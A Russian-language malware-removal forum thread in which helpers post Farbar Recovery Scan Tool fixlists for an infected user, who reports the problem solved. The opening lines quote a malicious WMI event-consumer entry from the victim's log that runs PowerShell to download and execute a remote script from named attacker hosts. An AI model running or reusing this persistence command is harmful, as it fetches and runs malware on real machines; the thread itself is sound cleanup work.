WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

• Обратите внимание, что компьютер будет перезагружен.

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Сделайте новые логи FRST.

 

Fixlog.txt

Addition.txt

FRST.txt

[mike 1]

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

• Временно выгрузите антивирус, файрволл и прочее защитное ПО
  

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

CreateRestorePoint:

CloseProcesses:

Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION

2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps

2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s

2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p

ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  

• Обратите внимание, что компьютер будет перезагружен.
  

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
  

 

 

Пробуйте установить антивирус. 

[Larisa46]

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

• Временно выгрузите антивирус, файрволл и прочее защитное ПО

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

CreateRestorePoint:
CloseProcesses:
Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION
2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s
2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

• Обратите внимание, что компьютер будет перезагружен.

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Пробуйте установить антивирус. 

 

Теперь все отлично, тормоза пропали. Антивирь встал нормально. Благодарю за помощь.+ в карму.